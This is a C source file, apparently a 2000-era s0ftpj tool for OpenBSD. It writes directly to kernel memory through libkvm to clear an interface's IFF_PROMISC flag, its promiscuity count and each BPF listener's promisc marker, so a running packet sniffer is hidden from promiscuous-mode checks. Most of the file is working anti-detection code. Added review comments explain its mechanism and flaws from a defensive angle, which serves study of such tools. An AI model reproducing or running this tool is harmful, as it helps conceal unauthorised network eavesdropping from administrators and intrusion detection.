Total obscurity for BPF Promisc Mode. OpenBSD Port.
4075e9176076c0914106ea44b5e66b037da9891ef3eb9c883807688ff1af19b2
/*
* Name: Promisc Mode Obscurity via kvm
* Date: May 23 03:46:51 2000
* Author: pIGpEN [ pigpen@s0ftpj.org, deadhead@sikurezza.org ]
*
* SoftProject Digital Security for Y2K
* Sikurezza.org Italian Security Mailing List
*
* COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
* Poul-Henning Kamp <phk@FreeBSD.ORG> but you can give me in return a coffee.
*
* Tested on: OpenBSD 2.6 kern#0 i386
*
* cc obsd_obscura.c -lkvm
*/
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <kvm.h>
#include <err.h>
#include <sysexits.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <net/if.h>
#include <net/bpfdesc.h>
/*
 * Error(x): report x through errx(3) and exit with EX_UNAVAILABLE.
 * x is handed to errx() as the format string, so it must be a string
 * literal; every call site in this file passes one. The expansion already
 * ends in ';', so a call written as Error("...") ; yields an extra empty
 * statement.
 */
#define Error(x) errx(EX_UNAVAILABLE, x);
/*
 * Symbol table passed to kvm_nlist() in main(). The single entry "_ifnet"
 * is read there as a struct ifnet_head (the head of the interface list);
 * the NULL-name entry terminates the array.
 */
struct nlist list[] = {
{"_ifnet"},
{NULL}
};
/*
 * usage - print the banner and the one-line synopsis, then terminate.
 *
 * arg: program name shown in the synopsis (main() passes argv[0]).
 *
 * Does not return: the process exits with status 0.
 */
void
usage(char *arg)
{
    /* Fixed banner text goes out in one write to stdout. */
    fputs("OpenBSD - Promisc Total Obscurity\n"
          "---------------------------------\n\n"
          "Coded By pIGpEN / s0FtPj Y2k\n\n", stdout);

    /* Synopsis: the only argument is the interface name. */
    fprintf(stdout, "%s <interface>\n", arg);

    exit(0);
}
/*
 * bpf_zero - walk the BPF descriptor list attached to one interface and
 * clear the bd_promisc field of every descriptor that has it set.
 *
 * kd:  kvm handle. main() opens it with O_RDWR, so the kvm_write() below
 *      modifies the kernel's copy of each descriptor.
 * ifp: userland copy of the interface's struct ifnet; only ifp->if_bpf
 *      (a kernel address) is used.
 *
 * Prints one status line per descriptor found. Returns nothing.
 *
 * Review notes:
 *  - Only bd_promisc is changed. Nothing here unlinks a descriptor from
 *    bif_dlist, so the listeners themselves stay on the list; what is lost
 *    is the marker saying which of them asked for promiscuous mode.
 *  - None of the kvm_read()/kvm_write() return values are checked. After a
 *    failed read, ibpf/dbpf hold indeterminate data and the loop follows
 *    whatever pointer value is in them.
 *  - Each write puts back the whole struct bpf_d that was read a moment
 *    earlier, not just the one field, so any change the kernel made to the
 *    descriptor in between is overwritten with the older copy.
 */
void
bpf_zero(kvm_t *kd, struct ifnet *ifp)
{
struct bpf_if ibpf;
struct bpf_d dbpf, *pdbpf;
int count = 0;
/* Copy the interface's struct bpf_if out of kernel memory. */
kvm_read(kd, (u_long) ifp->if_bpf, &ibpf, sizeof ibpf);
/* pdbpf is a kernel address; dbpf is the local copy whose bd_next drives the walk. */
for(pdbpf = ibpf.bif_dlist; pdbpf; pdbpf = dbpf.bd_next) {
kvm_read(kd, (u_long) pdbpf, &dbpf, sizeof dbpf);
/* Reports the state found before any change is made. */
printf("#%d listener has %s promisc mode enabled",
++count, (!dbpf.bd_promisc) ? "no " : " ");
if(dbpf.bd_promisc) {
printf(" (changed)");
dbpf.bd_promisc = 0;
/* Whole-structure write-back to the descriptor's kernel address. */
kvm_write(kd, (u_long) pdbpf, &dbpf, sizeof dbpf);
}
putchar('\n');
}
}
/*
 * main - locate the interface named by argv[1] in the kernel's interface
 * list and, if it is flagged promiscuous, clear that bookkeeping directly
 * in kernel memory.
 *
 * Flow: open a read/write kvm handle, resolve "_ifnet" with kvm_nlist(),
 * walk the interface list, and for the matching entry clear IFF_PROMISC and
 * if_pcount, write the structure back, then call bpf_zero() for its BPF
 * descriptors. Interfaces that do not match are only printed.
 *
 * Returns 0. Exits through Error() if the handle cannot be opened or the
 * symbol cannot be resolved, and through usage() on a wrong argument count.
 *
 * Review notes (defensive reading):
 *  - Everything depends on kvm_open() succeeding with O_RDWR, i.e. on write
 *    access to kernel memory. NOTE(review): on systems where a raised
 *    securelevel blocks writes to the kernel memory devices this path
 *    should fail; confirm for the deployment in question.
 *  - Only software state is edited. Nothing in this file reprograms the
 *    network driver, so the hardware receive filter presumably stays as it
 *    was (TODO confirm). The reported interface flags can then disagree
 *    with what the card is doing, so a check that trusts IFF_PROMISC alone
 *    is not sufficient evidence that no capture is running.
 *  - kvm_read()/kvm_write() return values are never checked.
 */
int
main(int argc, char **argv)
{
kvm_t *kd;
struct ifnet_head ifh;
struct ifnet ifc, *ifp;
/* usage() does not return. */
if(argc != 2)
usage(argv[0]);
/*
 * NULL for the first three arguments leaves the choice of kernel image and
 * memory source to libkvm. NOTE(review): presumably the running system,
 * see kvm_open(3). argv[0] is the prefix for libkvm's error messages.
 */
if(!(kd=kvm_open(NULL, NULL, NULL, O_RDWR, argv[0])))
Error("kvm_open()");
if(kvm_nlist(kd, list) == -1)
Error("kvm_nlist()");
/* A zero n_value means "_ifnet" was not resolved. */
if(!list[0].n_value)
Error("checking n_value");
/* Copy the list head out of kernel memory. */
kvm_read(kd, list[0].n_value, &ifh, sizeof ifh);
/* ifp is a kernel address; ifc is the local copy used for the next pointer. */
for(ifp = ifh.tqh_first; ifp; ifp = ifc.if_list.tqe_next) {
kvm_read(kd, (u_long) ifp, &ifc, sizeof ifc);
if(!strcmp(argv[1], ifc.if_xname)) {
printf("%s found ... promisc mode ", ifc.if_xname);
if(ifc.if_flags & IFF_PROMISC) {
printf("(found)\n");
/* This if governs only the if_pcount assignment that follows the comment. */
if(ifc.if_pcount)
/* Like in FreeBSD version, you can do a
* perfect thing by decreasing for each
* descriptor found
*/
ifc.if_pcount = 0;
/* Not part of the if above: runs whenever IFF_PROMISC was set. */
ifc.if_flags &= ~IFF_PROMISC;
/*
 * Writes back the entire struct ifnet read at the top of the loop body,
 * so fields the kernel updated since that read are replaced by stale values.
 */
kvm_write(kd, (u_long) ifp, &ifc, sizeof ifc);
printf("BPF Analysis for %s interface\n",
ifc.if_xname);
bpf_zero(kd, &ifc);
}else
printf("(not found)\n");
}else
printf("skipping -> %s\n", ifc.if_xname);
/* No break: the walk continues to the end of the list after a match. */
}
kvm_close(kd);
return 0;
}